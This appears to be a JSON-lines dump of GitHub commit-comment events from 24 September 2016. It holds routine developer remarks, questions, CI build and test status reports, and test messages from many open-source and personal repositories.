{"id":"4613371347","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19161340,"position":null,"line":null,"path":null,"commit_id":"422d4acb4cc18ff983752163cbed8e4ceb10c2be","created_at":"2016-09-24T23:48:55Z","updated_at":"2016-09-24T23:48:55Z","body":"I don't know how to use capes yet on Genisys plus use file_get_contents on a skin file with a text format and base64 encoded"}},"created_at":"2016-09-24T23:48:55Z"}
{"id":"4613372512","type":"CommitCommentEvent","actor":{"login":"Tehchy"},"repo":{"name":"llomgui/OceanProject-Bot"},"payload":{"comment":{"id":19161343,"position":null,"line":null,"path":null,"commit_id":"cd7fbebd082c0d305658f5256ed448999fd5c61e","created_at":"2016-09-24T23:50:05Z","updated_at":"2016-09-24T23:50:05Z","body":"XeR is alive"}},"created_at":"2016-09-24T23:50:05Z"}
{"id":"4613376498","type":"CommitCommentEvent","actor":{"login":"Ozhead"},"repo":{"name":"AllTheHaxx/AllTheHaxx"},"payload":{"comment":{"id":19161358,"position":null,"line":null,"path":null,"commit_id":"8d5ee48f4f9076caa164430810842dc6f199e7a0","created_at":"2016-09-24T23:53:58Z","updated_at":"2016-09-24T23:53:58Z","body":"Such commit"}},"created_at":"2016-09-24T23:53:58Z"}
{"id":"4613377131","type":"CommitCommentEvent","actor":{"login":"sachinrekhi"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19161359,"position":null,"line":null,"path":null,"commit_id":"381a0051c7ec5bde4c35967e336050c8dca6a677","created_at":"2016-09-24T23:54:35Z","updated_at":"2016-09-24T23:54:35Z","body":"@fred2028 This component is great and I have it up and running! However what I can't figure out is after a user takes a quick action, how do I close the quick actions programmatically?\r\n\r\nI have a TouchableOpacity onPress handler within renderQuickActions which handles the action. But from the handler, how can I close the quick actions display? I saw that SwipeableRow has a function called _animateToClosedPosition() which looks promising, but no idea how I would have a reference to the SwipeableRow instance for the particular row I'm on. Any thoughts?"}},"created_at":"2016-09-24T23:54:35Z"}
{"id":"4613377329","type":"CommitCommentEvent","actor":{"login":"trammel"},"repo":{"name":"Stankec/google-analytics-turbolinks"},"payload":{"comment":{"id":19161360,"position":null,"line":null,"path":null,"commit_id":"ffec14c18fce694f15a8f6bcb9824a09a0a4103d","created_at":"2016-09-24T23:54:48Z","updated_at":"2016-09-24T23:54:48Z","body":"I'm looking at using this gem, but I don't understand why change the event from 'page:change' to 'turbolinks:request-start'. This seems to be a bit of code originally for backwards compatability, where Turbolinks 4 used the 'page:change' event to signal a page changing, and turbolinks 5 uses 'turbolinks:load'. Why make this change?\r\n"}},"created_at":"2016-09-24T23:54:48Z"}
{"id":"4613378243","type":"CommitCommentEvent","actor":{"login":"fr500"},"repo":{"name":"libretro/dosbox-libretro"},"payload":{"comment":{"id":19161364,"position":null,"line":null,"path":null,"commit_id":"631adffc8978f6e96c654fb6e5bd27f2752f2b34","created_at":"2016-09-24T23:55:45Z","updated_at":"2016-09-24T23:55:45Z","body":"It's now failing to build for Android:\r\n\r\n> <AlcaRoboTwo> dosbox-armeabi: [status: fail] [recipes/android/cores-android-jni] LOG: http://hastebin.com/kupapubabu\r\n> <AlcaRoboTwo> dosbox-armeabi-v7a: [status: fail] [recipes/android/cores-android-jni] LOG: http://hastebin.com/ibahusarul\r\n> <AlcaRoboTwo> dosbox-x86: [status: fail] [recipes/android/cores-android-jni] LOG: http://hastebin.com/sexedalotu"}},"created_at":"2016-09-24T23:55:45Z"}
{"id":"4613381240","type":"CommitCommentEvent","actor":{"login":"brettcannon"},"repo":{"name":"python/devguide"},"payload":{"comment":{"id":19161367,"position":8,"line":43,"path":"coverity.rst","commit_id":"10317f527701378b68aa248415d33a57e34c7869","created_at":"2016-09-24T23:58:36Z","updated_at":"2016-09-24T23:58:36Z","body":"Since this already got committed, feel free to edit the doc directly and submit an update for the wording if you want."}},"created_at":"2016-09-24T23:58:36Z"}
{"id":"4613381738","type":"CommitCommentEvent","actor":{"login":"SivanMehta"},"repo":{"name":"SivanMehta/wander"},"payload":{"comment":{"id":19161369,"position":null,"line":null,"path":null,"commit_id":"8dd5f9ae7201d12333c09e00b7a42aab6b338a11","created_at":"2016-09-24T23:59:08Z","updated_at":"2016-09-24T23:59:08Z","body":"![screen shot 2016-09-24 at 8 01 02 pm](https://cloud.githubusercontent.com/assets/6868877/18811964/58717c68-8291-11e6-88f7-b765d846e5c7.png)\r\n"}},"created_at":"2016-09-24T23:59:08Z"}
{"id":"4611828490","type":"CommitCommentEvent","actor":{"login":"haonan-hhn"},"repo":{"name":"dajia-network/dajiav2"},"payload":{"comment":{"id":19155933,"position":66,"line":88,"path":"dajia-core/src/main/java/com/dajia/service/RefundService.java","commit_id":"427cd08ab98c568d960d303cec7dd073f8c1af24","created_at":"2016-09-24T03:01:37Z","updated_at":"2016-09-24T03:01:37Z","body":" 打印job结束时间"}},"created_at":"2016-09-24T03:01:37Z"}
{"id":"4611830690","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19155944,"position":null,"line":null,"path":null,"commit_id":"0a22957481b7a9bd963bec94bb81cc6df6f0b413","created_at":"2016-09-24T03:03:19Z","updated_at":"2016-09-24T03:03:19Z","body":"Also see [issue 304](http://github.com/weidai11/cryptopp/issues/304)."}},"created_at":"2016-09-24T03:03:19Z"}
{"id":"4611832145","type":"CommitCommentEvent","actor":{"login":"fpletz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19155951,"position":null,"line":null,"path":null,"commit_id":"c8dba2581cb449eb6d87968df0edd7f9b62d12eb","created_at":"2016-09-24T03:04:28Z","updated_at":"2016-09-24T03:04:28Z","body":"Yup, that upgrade rebuilds some kde and gnome stuff and has no security fixes as far as I could see."}},"created_at":"2016-09-24T03:04:28Z"}
{"id":"4611832172","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155952,"position":null,"line":null,"path":null,"commit_id":"d7438d316b68758f07f1971d31d47d04bf710800","created_at":"2016-09-24T03:04:30Z","updated_at":"2016-09-24T03:04:30Z","body":"2782485_HybridModel (sanghlee-lbnl) - Win64-Windows-7-VisualStudio-12: Tests Failed (1667 of 2242 tests passed, 5 test warnings)\n\n * 27 tests had: AUD diffs.\n * 27 tests had: EIO diffs.\n * 27 tests had: ESO small diffs.\n * 22 tests had: Table big diffs.\n * 9 tests had: ERR diffs.\n * 12 tests had: MTR small diffs.\n * 1 test had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d7438d316b68758f07f1971d31d47d04bf710800-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-74.35%25-red.svg)</a> \n"}},"created_at":"2016-09-24T03:04:30Z"}
{"id":"4611832606","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19155955,"position":5,"line":22,"path":"kong/meta.lua","commit_id":"243f6ea1b3d3130897c37a4d00cb1de80d54272c","created_at":"2016-09-24T03:04:57Z","updated_at":"2016-09-24T03:04:57Z","body":"Could we isolate this in another PR is no other change from here is required to make 0.8.0 work with Kong?"}},"created_at":"2016-09-24T03:04:57Z"}
{"id":"4611833536","type":"CommitCommentEvent","actor":{"login":"thibaultcha"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19155958,"position":5,"line":22,"path":"kong/meta.lua","commit_id":"243f6ea1b3d3130897c37a4d00cb1de80d54272c","created_at":"2016-09-24T03:05:47Z","updated_at":"2016-09-24T03:05:47Z","body":"(If already usable with 0.8, that is. It's annoying right now with the hombrew mess)"}},"created_at":"2016-09-24T03:05:47Z"}
{"id":"4611833664","type":"CommitCommentEvent","actor":{"login":"Santikun"},"repo":{"name":"kivikakk/ifsexplorer"},"payload":{"comment":{"id":19155959,"position":null,"line":null,"path":null,"commit_id":"f1095ad2c73d2ebc7ffcf64933bf7d5b5e6106a5","created_at":"2016-09-24T03:05:53Z","updated_at":"2016-09-24T03:05:53Z","body":"Thank you a lot! :D"}},"created_at":"2016-09-24T03:05:53Z"}
{"id":"4611834722","type":"CommitCommentEvent","actor":{"login":"isuPatches"},"repo":{"name":"isuPatches/RockThePatchv4"},"payload":{"comment":{"id":19155966,"position":null,"line":null,"path":null,"commit_id":"6aa31e71c175d2f15233f1b4bb1211b096a69604","created_at":"2016-09-24T03:06:45Z","updated_at":"2016-09-24T03:06:45Z","body":"closes #11\r\ncloses #7 \r\ncloses #4"}},"created_at":"2016-09-24T03:06:45Z"}
{"id":"4611838686","type":"CommitCommentEvent","actor":{"login":"thefosk"},"repo":{"name":"Mashape/kong"},"payload":{"comment":{"id":19155984,"position":5,"line":22,"path":"kong/meta.lua","commit_id":"243f6ea1b3d3130897c37a4d00cb1de80d54272c","created_at":"2016-09-24T03:10:00Z","updated_at":"2016-09-24T03:10:00Z","body":"Yes that can be done. It works with both 0.7 and 0.8 - Although there is `segfault` in Serf 0.7 and 0.8 in OSX Sierra. It's a pretty severe issue and I have opened an issue on their repo. "}},"created_at":"2016-09-24T03:10:00Z"}
{"id":"4611840198","type":"CommitCommentEvent","actor":{"login":"squeezy102"},"repo":{"name":"squeezy102/OurGame"},"payload":{"comment":{"id":19155992,"position":null,"line":null,"path":null,"commit_id":"77cfef35ad0d521abc42a6d7e27f65ea00c22f70","created_at":"2016-09-24T03:11:19Z","updated_at":"2016-09-24T03:11:19Z","body":"Having the room contain only a linked list doesn't get the job done that we want.  That means when you enter a room, you're faced with a Linked List of entities.  Basically, everything you can intereact with in the room is already at your fingertips as soon as you enter.\r\n\r\nWhat we ACTUALLY want is for the player to have to move from node to node, and see what else is in the node with him.  By this logic, I think having an 8x8 array of Linked Lists is more appropriate.  This way, when a player moves, we can go:\r\n\r\n`roomgrid[0,0].removePlayerObject;\r\nroomgrid[1,1].addPlayerObject;`\r\n\r\nAnd the linked list at roomgrid[1,1] will contain pre-built entities for the player to interact with."}},"created_at":"2016-09-24T03:11:19Z"}
{"id":"4611845333","type":"CommitCommentEvent","actor":{"login":"IrinaUX"},"repo":{"name":"IrinaUX/Test"},"payload":{"comment":{"id":19156011,"position":null,"line":null,"path":null,"commit_id":"af346b21b86d1ad867c4fa009ad6de90991a3a06","created_at":"2016-09-24T03:15:35Z","updated_at":"2016-09-24T03:15:35Z","body":"Hello world"}},"created_at":"2016-09-24T03:15:35Z"}
{"id":"4611845942","type":"CommitCommentEvent","actor":{"login":"IrinaUX"},"repo":{"name":"IrinaUX/Test"},"payload":{"comment":{"id":19156014,"position":null,"line":null,"path":null,"commit_id":"af346b21b86d1ad867c4fa009ad6de90991a3a06","created_at":"2016-09-24T03:16:06Z","updated_at":"2016-09-24T03:16:06Z","body":"Hello world2\r\n"}},"created_at":"2016-09-24T03:16:06Z"}
{"id":"4611846657","type":"CommitCommentEvent","actor":{"login":"IrinaUX"},"repo":{"name":"IrinaUX/Test"},"payload":{"comment":{"id":19156017,"position":2,"line":2,"path":"README.md","commit_id":"af346b21b86d1ad867c4fa009ad6de90991a3a06","created_at":"2016-09-24T03:16:41Z","updated_at":"2016-09-24T03:16:41Z","body":"Hello world3\r\n"}},"created_at":"2016-09-24T03:16:41Z"}
{"id":"4611847220","type":"CommitCommentEvent","actor":{"login":"rosenhouse"},"repo":{"name":"cloudfoundry-incubator/netman-release"},"payload":{"comment":{"id":19156020,"position":47,"line":177,"path":"src/netman-cf-acceptance/init_test.go","commit_id":"2bb5ec5733e1f6443e0013930f4edaeba91da9dd","created_at":"2016-09-24T03:17:09Z","updated_at":"2016-09-24T03:17:09Z","body":"@genevievelesperance @markstgodard: I notice you don't have a `defer GinkgoRecover()` in here, and it also is not in the `ParallelRunner` itself.  It's important that it be in one of those two places, otherwise failed assertions will not get correctly reported, and `AfterEach` blocks will not be run.  (See [here](https://onsi.github.io/ginkgo/#marking-specs-as-failed)).\r\n\r\nThe advantage of putting it directly in the test helper is that then the test author doesn't need to remember to include it when using the helper."}},"created_at":"2016-09-24T03:17:09Z"}
{"id":"4611849738","type":"CommitCommentEvent","actor":{"login":"DongDong632718427"},"repo":{"name":"DongDong632718427/WebProject"},"payload":{"comment":{"id":19156028,"position":null,"line":null,"path":null,"commit_id":"9c62faaf2eb89a9585f9632d5dcc56630e86d5f7","created_at":"2016-09-24T03:19:15Z","updated_at":"2016-09-24T03:19:15Z","body":"Update README.md"}},"created_at":"2016-09-24T03:19:15Z"}
{"id":"4611851965","type":"CommitCommentEvent","actor":{"login":"WBittner"},"repo":{"name":"YUKV/contacts"},"payload":{"comment":{"id":19156032,"position":null,"line":null,"path":null,"commit_id":"f5206eded33b07acebb14e7e9c220f45edcbd84c","created_at":"2016-09-24T03:21:11Z","updated_at":"2016-09-24T03:21:11Z","body":"@murlinw Not sure if this version of TS is out of beta, but it's the newest that npm has. Also, angular has some dependency needs I did not address."}},"created_at":"2016-09-24T03:21:11Z"}
{"id":"4611852377","type":"CommitCommentEvent","actor":{"login":"Badeye"},"repo":{"name":"Badeye/Fail-or-Fall"},"payload":{"comment":{"id":19156034,"position":null,"line":null,"path":null,"commit_id":"7aa8e5b5e514fd22c82df428e96b8d3e13f6cf4e","created_at":"2016-09-24T03:21:35Z","updated_at":"2016-09-24T03:21:35Z","body":"That was one hell of a night"}},"created_at":"2016-09-24T03:21:35Z"}
{"id":"4611852845","type":"CommitCommentEvent","actor":{"login":"arthurnn"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19156036,"position":null,"line":null,"path":null,"commit_id":"a502703c3d2151d4d3b421b29fefdac5ad05df61","created_at":"2016-09-24T03:21:58Z","updated_at":"2016-09-24T03:21:58Z","body":"@connorshea As far as I can tell, the `TRUE_VALUES` constant was public. So yeah, we could add a note to the changelog. WDYT @rafaelfranca ?"}},"created_at":"2016-09-24T03:21:58Z"}
{"id":"4611858403","type":"CommitCommentEvent","actor":{"login":"lethosor"},"repo":{"name":"jjyg/df_misc"},"payload":{"comment":{"id":19156052,"position":null,"line":null,"path":null,"commit_id":"0d29f2d971554399ba0359c8e752d068b3580e1f","created_at":"2016-09-24T03:26:42Z","updated_at":"2016-09-24T03:26:42Z","body":"OS X isn't using a newer GCC..."}},"created_at":"2016-09-24T03:26:42Z"}
{"id":"4611859848","type":"CommitCommentEvent","actor":{"login":"felipepereira2697"},"repo":{"name":"felipepereira2697/Source-Code-Inspection"},"payload":{"comment":{"id":19156060,"position":null,"line":null,"path":null,"commit_id":"efc0b591cf2c4b3de756ca9be29ef2303ab29614","created_at":"2016-09-24T03:27:59Z","updated_at":"2016-09-24T03:27:59Z","body":"# **ERRATA: Corrigindo aqui a issue #12 que se refere à falta de implementação**# "}},"created_at":"2016-09-24T03:27:59Z"}
{"id":"4611862489","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"luixxiul/browser-laptop"},"payload":{"comment":{"id":19156065,"position":null,"line":null,"path":null,"commit_id":"988ba83ed44eae340b1ada87bd0ea37d19f62cbd","created_at":"2016-09-24T03:30:09Z","updated_at":"2016-09-24T03:30:09Z","body":"I don't mind either way but just curious if you  have thoughts on if it's better to use generic 'ok' for all or to have different identifiers with same text 'ok'?"}},"created_at":"2016-09-24T03:30:09Z"}
{"id":"4611862561","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"luixxiul/browser-laptop"},"payload":{"comment":{"id":19156066,"position":null,"line":null,"path":null,"commit_id":"988ba83ed44eae340b1ada87bd0ea37d19f62cbd","created_at":"2016-09-24T03:30:12Z","updated_at":"2016-09-24T03:30:12Z","body":"++"}},"created_at":"2016-09-24T03:30:12Z"}
{"id":"4611867120","type":"CommitCommentEvent","actor":{"login":"luixxiul"},"repo":{"name":"luixxiul/browser-laptop"},"payload":{"comment":{"id":19156077,"position":null,"line":null,"path":null,"commit_id":"988ba83ed44eae340b1ada87bd0ea37d19f62cbd","created_at":"2016-09-24T03:33:43Z","updated_at":"2016-09-24T03:33:43Z","body":"I prefer the latter just in case. It won't take time to localize them anyway."}},"created_at":"2016-09-24T03:33:43Z"}
{"id":"4611872327","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19156102,"position":null,"line":null,"path":null,"commit_id":"a681eb955a53061af6e20744387e06600667e3ce","created_at":"2016-09-24T03:38:02Z","updated_at":"2016-09-24T03:38:02Z","body":"Sorry for my ugly indentation, I was using .editorconfig with 2 spaces as a tab..."}},"created_at":"2016-09-24T03:38:02Z"}
{"id":"4611872532","type":"CommitCommentEvent","actor":{"login":"JotaRaffalli"},"repo":{"name":"JotaRaffalli/Torneo-De-Tennis_Estucturas-de-datos-dinamicas-y-anidadas"},"payload":{"comment":{"id":19156105,"position":null,"line":null,"path":null,"commit_id":"9854cb04cd9631a48926d1295ef05bb5937682fb","created_at":"2016-09-24T03:38:14Z","updated_at":"2016-09-24T03:38:14Z","body":"cambio img"}},"created_at":"2016-09-24T03:38:14Z"}
{"id":"4611872840","type":"CommitCommentEvent","actor":{"login":"diegozmweb"},"repo":{"name":"Pyorg/P_2016"},"payload":{"comment":{"id":19156107,"position":null,"line":null,"path":null,"commit_id":"640dea84167aac50a3abbdef76d39079828caa83","created_at":"2016-09-24T03:38:30Z","updated_at":"2016-09-24T03:38:30Z","body":"Gracias!"}},"created_at":"2016-09-24T03:38:30Z"}
{"id":"4611875494","type":"CommitCommentEvent","actor":{"login":"geanders"},"repo":{"name":"geanders/RProgrammingForResearch"},"payload":{"comment":{"id":19156114,"position":null,"line":null,"path":null,"commit_id":"e2e547931a51fd2b3df4aca4d32148e287e9520d","created_at":"2016-09-24T03:40:52Z","updated_at":"2016-09-24T03:40:52Z","body":"Yes, I would think so, and you're right, it's not easy to diagnose the error from the message you get in the log when it happens.\n________________________________\nFrom: Yihui Xie <notifications@github.com>\nSent: Friday, September 23, 2016 8:54:39 PM\nTo: geanders/RProgrammingForResearch\nCc: Anderson,Brooke; Author\nSubject: Re: [geanders/RProgrammingForResearch] Try without backticks in the nepaliscatter1 caption... (e2e5479)\n\n\nYou are welcome. I'll try to fix the figure caption issue since other people are likely to run into it as well.\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/geanders/RProgrammingForResearch/commit/e2e547931a51fd2b3df4aca4d32148e287e9520d#commitcomment-19155895>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AFVFiHhaq-zrVze-pVIDBGEjwakcCz8oks5qtJDvgaJpZM4KFhgz>.\n"}},"created_at":"2016-09-24T03:40:52Z"}
{"id":"4611879060","type":"CommitCommentEvent","actor":{"login":"Barteks2x"},"repo":{"name":"Barteks2x/CubicChunks"},"payload":{"comment":{"id":19156134,"position":14,"line":865,"path":"src/main/java/cubicchunks/world/column/Column.java","commit_id":"9904e0069de29357f91902ba5a4f1cdad15f0138","created_at":"2016-09-24T03:44:07Z","updated_at":"2016-09-24T03:44:07Z","body":"damn, I still got it wrong"}},"created_at":"2016-09-24T03:44:07Z"}
{"id":"4611879336","type":"CommitCommentEvent","actor":{"login":"mturilli"},"repo":{"name":"radical-cybertools/radical.analytics"},"payload":{"comment":{"id":19156136,"position":null,"line":null,"path":null,"commit_id":"a34dbb3a8efe86eca24983b5f422ae89c2f459d4","created_at":"2016-09-24T03:44:22Z","updated_at":"2016-09-24T03:44:22Z","body":"Sure, please feel free to suggest alternatives :)"}},"created_at":"2016-09-24T03:44:22Z"}
{"id":"4611879637","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19156142,"position":null,"line":null,"path":null,"commit_id":"f4eb0447f0b6ae843b22a19fe2b717cb90afd619","created_at":"2016-09-24T03:44:39Z","updated_at":"2016-09-24T03:44:39Z","body":"for_cbes (YixingChen) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2373 of 2447 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f4eb0447f0b6ae843b22a19fe2b717cb90afd619-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f4eb0447f0b6ae843b22a19fe2b717cb90afd619-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.98%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T03:44:39Z"}
{"id":"4611879881","type":"CommitCommentEvent","actor":{"login":"ZhongZongkun"},"repo":{"name":"ZhongZongkun/test"},"payload":{"comment":{"id":19156144,"position":null,"line":null,"path":null,"commit_id":"439cf0014faf6e8a90f8b3b32f56414132a6d586","created_at":"2016-09-24T03:44:53Z","updated_at":"2016-09-24T03:44:53Z","body":"i know that"}},"created_at":"2016-09-24T03:44:53Z"}
{"id":"4611882896","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156159,"position":null,"line":null,"path":null,"commit_id":"67964cef06caec5dfc0e0d0aa362766d7ae1fd9e","created_at":"2016-09-24T03:47:37Z","updated_at":"2016-09-24T03:47:37Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-67964cef06caec5dfc0e0d0aa362766d7ae1fd9e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-24T03:47:37Z"}
{"id":"4611886021","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19156166,"position":null,"line":null,"path":null,"commit_id":"f4eb0447f0b6ae843b22a19fe2b717cb90afd619","created_at":"2016-09-24T03:50:21Z","updated_at":"2016-09-24T03:50:21Z","body":"for_cbes (YixingChen) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f4eb0447f0b6ae843b22a19fe2b717cb90afd619-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-24T03:50:21Z"}
{"id":"4611887133","type":"CommitCommentEvent","actor":{"login":"benjioh5"},"repo":{"name":"benjioh5/icewall-guideline"},"payload":{"comment":{"id":19156170,"position":null,"line":null,"path":null,"commit_id":"2064497afb83a913dcffc14a98d2e47745e18947","created_at":"2016-09-24T03:51:12Z","updated_at":"2016-09-24T03:51:12Z","body":".......... 우리학교 너무하네"}},"created_at":"2016-09-24T03:51:12Z"}
{"id":"4611888031","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19156175,"position":null,"line":null,"path":null,"commit_id":"77595ff35ad3f9bbfc0bb7ca74e499ff94f81674","created_at":"2016-09-24T03:52:01Z","updated_at":"2016-09-24T03:52:01Z","body":"os_2_0_fix_static_build (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-77595ff35ad3f9bbfc0bb7ca74e499ff94f81674-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-77595ff35ad3f9bbfc0bb7ca74e499ff94f81674-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-24T03:52:01Z"}
{"id":"4611889614","type":"CommitCommentEvent","actor":{"login":"rifqithomirt"},"repo":{"name":"documentcloud/rails-bootstrap-forms"},"payload":{"comment":{"id":19156181,"position":4,"line":3,"path":"README.md","commit_id":"04e41bec87bbdf1fd36b64f741b1dd484f9e4fdd","created_at":"2016-09-24T03:53:22Z","updated_at":"2016-09-24T03:53:22Z","body":"okasdasd"}},"created_at":"2016-09-24T03:53:22Z"}
{"id":"4611890382","type":"CommitCommentEvent","actor":{"login":"AdamT"},"repo":{"name":"nycdavid/Everkan"},"payload":{"comment":{"id":19156182,"position":null,"line":null,"path":null,"commit_id":"6f1db5c3b34fe13324879423ff1da15c1782750a","created_at":"2016-09-24T03:54:06Z","updated_at":"2016-09-24T03:54:06Z","body":"oops, i'm on this wip commit 😄 "}},"created_at":"2016-09-24T03:54:06Z"}
{"id":"4611891152","type":"CommitCommentEvent","actor":{"login":"benjioh5"},"repo":{"name":"HYU-ICEWALL/blog"},"payload":{"comment":{"id":19156184,"position":null,"line":null,"path":null,"commit_id":"565df7f922d4631b64638a0d976603f01dade819","created_at":"2016-09-24T03:54:44Z","updated_at":"2016-09-24T03:54:44Z","body":"네 알겠습니다 ㅠㅠㅠ.. 는 이슈로 다시죠 이런건 ㅠㅠ"}},"created_at":"2016-09-24T03:54:44Z"}
{"id":"4611891803","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19156187,"position":null,"line":null,"path":null,"commit_id":"42394a77ca33c6ca873069614fa0c01cf20a1695","created_at":"2016-09-24T03:55:23Z","updated_at":"2016-09-24T03:55:23Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (2337 of 2345 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T03:55:23Z"}
{"id":"4611891886","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19156188,"position":null,"line":null,"path":null,"commit_id":"ca16ac6550e5a6b6ba1a8fdeb9c813d360469638","created_at":"2016-09-24T03:55:28Z","updated_at":"2016-09-24T03:55:28Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-24T03:55:28Z"}
{"id":"4611892599","type":"CommitCommentEvent","actor":{"login":"marcoDemetrio"},"repo":{"name":"marcoDemetrio/Servicios-publicos"},"payload":{"comment":{"id":19156192,"position":null,"line":null,"path":null,"commit_id":"ace97210b44b431c6670e30131922df7b26a7f01","created_at":"2016-09-24T03:56:14Z","updated_at":"2016-09-24T03:56:14Z","body":"subir codigo"}},"created_at":"2016-09-24T03:56:14Z"}
{"id":"4611893005","type":"CommitCommentEvent","actor":{"login":"loftin110980"},"repo":{"name":"segmentio/analytics.js"},"payload":{"comment":{"id":19156194,"position":null,"line":null,"path":null,"commit_id":"ab545b826899efcd942abca83cf3cf02469c46c7","created_at":"2016-09-24T03:56:36Z","updated_at":"2016-09-24T03:56:36Z","body":"\r\n[TypeList - Docs.txt](https://github.com/segmentio/analytics.js/files/490947/TypeList.-.Docs.txt)\r\n[menu.tar.gz](https://github.com/segmentio/analytics.js/files/490949/menu.tar.gz)\r\n\r\n[lcp.sdk.trace.txt](https://github.com/segmentio/analytics.js/files/490950/lcp.sdk.trace.txt)\r\n[log.txt](https://github.com/segmentio/analytics.js/files/490953/log.txt)\r\n\r\n\r\n[mstrings.zip](https://github.com/segmentio/analytics.js/files/490959/mstrings.zip)\r\n"}},"created_at":"2016-09-24T03:56:36Z"}
